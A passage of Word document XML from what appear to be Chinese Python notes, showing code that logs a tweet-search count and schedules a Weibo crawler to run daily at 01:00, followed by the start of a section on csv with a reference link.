        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"search_tweets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A08FBD4" w14:textId="3EA02574" w:rsidR="00B62939" w:rsidRDefault="00B62939" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>log_data.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>success</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>本次任务数据查询完毕，共检索</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>{items_count}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>个推特</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>format</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>items_count</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(items_count)))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">search_tweets_lock_flag = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612FFA52" w14:textId="35B1CAEF" w:rsidR="00B62939" w:rsidRPr="00B62939" w:rsidRDefault="00B62939" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F93836D" w14:textId="77777777" w:rsidR="00EA2F34" w:rsidRDefault="00EA2F34" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="074A0972" w14:textId="77777777" w:rsidR="00C859DF" w:rsidRDefault="00C859DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="337A18F7" w14:textId="21ACB49F" w:rsidR="000910F5" w:rsidRDefault="000910F5" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="559" w:name="_Toc159779992"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实际案例：每</w:t>
      </w:r>
      <w:r w:rsidR="00924925">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>天</w:t>
      </w:r>
      <w:r w:rsidR="008D00FA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定点</w:t>
      </w:r>
      <w:r w:rsidR="00924925">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行微博爬虫</w:t>
      </w:r>
      <w:bookmarkEnd w:id="559"/>
    </w:p>
    <w:p w14:paraId="268DE8B0" w14:textId="77777777" w:rsidR="009F5E87" w:rsidRDefault="009F5E87" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56E67060" w14:textId="77777777" w:rsidR="00924925" w:rsidRDefault="00924925" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>schedule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B4C854" w14:textId="77777777" w:rsidR="00205D72" w:rsidRDefault="00205D72" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="447D607A" w14:textId="77777777" w:rsidR="00205D72" w:rsidRDefault="00205D72" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>schedule.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>every</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>().day.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>at</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"01:00"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>do</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(run_weibo_spider)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA2352A" w14:textId="77777777" w:rsidR="00205D72" w:rsidRDefault="00205D72" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">__name__ == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"__main__"</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>try</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61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>run_weibo_spider</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61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>爬虫运行完毕</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">except </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Exception </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>err:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>爬虫运行完毕</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(err), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>flush</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>True</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5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>运行定时任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>while True</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schedule.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>run_pending</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time.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sleep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21743D86" w14:textId="77777777" w:rsidR="00205D72" w:rsidRPr="00205D72" w:rsidRDefault="00205D72" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E2D0848" w14:textId="77777777" w:rsidR="00924925" w:rsidRPr="000910F5" w:rsidRDefault="00924925" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="670D4097" w14:textId="77777777" w:rsidR="009F5E87" w:rsidRDefault="009F5E87" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F2FBF46" w14:textId="77777777" w:rsidR="009F5E87" w:rsidRDefault="009F5E87" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77292F32" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="560" w:name="_Toc159779993"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>csv</w:t>
      </w:r>
      <w:bookmarkEnd w:id="560"/>
    </w:p>
    <w:p w14:paraId="02049591" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EA8DA8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId155" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>https://www.cnblogs.com/superhin/p/11495956.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="35491F6E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51478EAD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
